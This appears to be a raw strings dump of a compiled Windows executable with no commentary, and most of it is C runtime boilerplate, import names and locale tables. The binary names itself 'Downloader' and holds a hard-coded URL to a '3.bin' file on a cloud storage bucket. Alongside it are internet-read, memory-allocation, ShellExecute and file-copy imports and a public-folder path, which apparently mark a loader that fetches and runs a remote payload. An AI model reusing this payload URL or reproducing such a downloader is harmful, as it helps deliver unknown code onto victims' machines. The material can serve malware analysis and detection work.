!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.rsrc
@.reloc
WATAUAVAWH
@A_A^A]A\_
t$ WATAUH
WATAUAVAWH
A_A^A]A\_
UVWATAUAVAWH
D$DD9T$\
t$hD+d$DD+
9D$Pti
A_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
ATAUAVH
A^A]A\
LcA<E3
x ATAUAVH
A^A]A\
Hct$@H
s\HcL$HH
ATAUAVH
fD9t$b
A^A]A\
@SUVWATAUAVH
PA^A]A\_^][
ATAUAWH
0A_A]A\
UVWATAUH
D$&8\$&t-8X
@A]A\_^]
L$ UVWH
fffffff
fffffff
\$ UVWATAUAVAWH
!|$DHc
|$DD9d$X
f;D$@ug
f;D$@uD
H!\$ H
HcD$HH;
H!\$ H
HcD$HH;
H!|$ L
A_A^A]A\_^]
VWATAUAVH
A^A]A\_^
@UATAUAVAWH
!t$(H!t$ A
A_A^A]A\]
@UATAUAVAWH
A_A^A]A\]
VWATAUAVH
A^A]A\_^
D8"u%H
CorExitProcess
(null)
`h````
xpxxxx
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
`h`hhh
xppwpp
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Downloader
https://yts2023811.oss-cn-hangzhou.aliyuncs.com/3.bin
VirtualFree
CopyFileW
GetModuleFileNameW
VirtualAlloc
KERNEL32.dll
ShellExecuteW
SHELL32.dll
InternetOpenUrlA
InternetReadFile
InternetOpenA
InternetCloseHandle
WININET.dll
PathFindFileNameW
PathFileExistsW
PathCombineW
SHLWAPI.dll
GetLastError
HeapFree
HeapAlloc
GetProcAddress
GetModuleHandleW
ExitProcess
DecodePointer
GetCommandLineA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
RtlVirtualUnwind
RtlLookupFunctionEntry
RtlCaptureContext
HeapSetInformation
GetVersion
HeapCreate
WriteFile
GetStdHandle
EncodePointer
RtlUnwindEx
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
LoadLibraryW
FlsGetValue
FlsSetValue
FlsFree
SetLastError
GetCurrentThreadId
FlsAlloc
GetModuleFileNameA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
GetStartupInfoW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
HeapSize
HeapReAlloc
GetConsoleCP
GetConsoleMode
FlushFileBuffers
LCMapStringW
MultiByteToWideChar
GetStringTypeW
SetFilePointer
CloseHandle
WriteConsoleW
SetStdHandle
CreateFileW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
(null)
USER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
((((( H
h(((( H
H
CONOUT$
C:\Users\Public\